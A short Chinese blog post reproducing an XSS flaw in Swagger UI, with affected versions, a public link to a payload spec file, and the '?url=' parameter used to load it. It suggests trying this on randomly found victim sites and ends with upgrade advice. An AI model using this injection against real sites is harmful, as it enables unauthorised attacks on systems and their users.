0
点赞
收藏
分享

微信扫一扫

Linux 第十八章

颜路在路上 2024-05-03 阅读 18
xss渗透

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户
根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗
json网站:https://jumpy-floor.surge.sh/test.yaml
拼接方式
?url=https://your_api_spec/spec.yaml
?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问
在这里插入图片描述
进行拼接?url=https://jumpy-floor.surge.sh/test.yaml
在这里插入图片描述
弹窗

修复建议:

升级到最新

举报

相关推荐

0 条评论